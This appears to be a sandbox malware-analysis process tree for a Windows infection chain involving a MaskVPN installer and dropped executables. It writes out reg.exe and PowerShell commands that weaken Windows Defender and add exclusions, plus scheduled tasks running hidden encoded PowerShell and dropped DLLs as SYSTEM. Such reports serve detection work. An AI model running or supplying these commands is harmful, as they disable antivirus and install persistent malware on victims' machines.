\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:12388

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1534163d-60e4-2142-b852-ec1fe0a4c254}\oemvista.inf" "9" "4d14a44ff" "000000000000016C" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:12560

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000016C"
2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:14368

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:15016

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
PID:15020

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4540

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:11984

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:12640

C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\rmwnDPC.exe
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\rmwnDPC.exe nh /site_id 754 /S
1⤵
- Drops file in System32 directory
PID:15332

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:13332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:14612

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:14728

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:15872

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:1892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:14956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3400

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:15244

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:1740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:8968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:15600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:15228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:15652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:1476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:15768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:16148

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:7780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:17220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:16356

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:4984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:16744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzJsMnpmYIHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzJsMnpmYIHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDaUpqLWU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDaUpqLWU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCoLVEAxuDhpC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCoLVEAxuDhpC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hxLIpSuPLJUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hxLIpSuPLJUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yjiDqdgnMIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yjiDqdgnMIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pJxacTbbSlizmPVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pJxacTbbSlizmPVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5392

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:6164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:7244

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6168

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:8348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:8080

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:8892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:7480

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:6592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:9028

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:9052

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:15980

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:8536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pJxacTbbSlizmPVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:6096

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pJxacTbbSlizmPVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:8632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE /t REG_DWORD /d 0 /reg:32
3⤵
PID:8464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE /t REG_DWORD /d 0 /reg:64
3⤵
PID:8260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj /t REG_DWORD /d 0 /reg:32
3⤵
PID:9220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj /t REG_DWORD /d 0 /reg:64
3⤵
PID:8644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZKIEJJPSRIlthXTT /t REG_DWORD /d 0 /reg:32
3⤵
PID:9608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZKIEJJPSRIlthXTT /t REG_DWORD /d 0 /reg:64
3⤵
PID:9688

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gytCVypMN" /SC once /ST 06:31:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:9060

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gytCVypMN"
2⤵
PID:9320

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gytCVypMN"
2⤵
PID:14312

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 04:26:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\SxjcCox.exe\" V8 /site_id 754 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:14588

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "cbBtQoNpOByPPTwrn"
2⤵
PID:13668

C:\Users\Admin\AppData\Local\Temp\33E8.tmp.exe
C:\Users\Admin\AppData\Local\Temp\33E8.tmp.exe
1⤵
- Loads dropped DLL
PID:16624

C:\Users\Admin\AppData\Local\Temp\436A.tmp.exe
C:\Users\Admin\AppData\Local\Temp\436A.tmp.exe
1⤵
PID:3944

C:\Users\Admin\AppData\Local\Temp\56A5.tmp.exe
C:\Users\Admin\AppData\Local\Temp\56A5.tmp.exe
1⤵
PID:7104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7104 -s 1124
2⤵
- Program crash
PID:4776

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5260

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:5212

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6844

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6252

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5784

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4992

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:6540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5904

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:8960

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8216

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4152

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4152 -s 2068
2⤵
- Program crash
PID:8300

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:8804

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8428

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:8100

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9548

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:10168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:9164

C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\SxjcCox.exe
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\SxjcCox.exe V8 /site_id 754 /S
1⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
PID:13968

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"
2⤵
PID:14036

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:15180

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:16980

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:4544

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:15372

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\RmTWIJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:16668

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\ocAwAqy.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:16108

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qTJPyBJZsADsDDd"
2⤵
PID:3156

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qTJPyBJZsADsDDd"
2⤵
PID:14188

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\fwrEYVm.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:16180

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\uDouXPq.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:15024

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\CglJrVA.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:11316

C:\Windows\SysWOW64\schtasks.exe
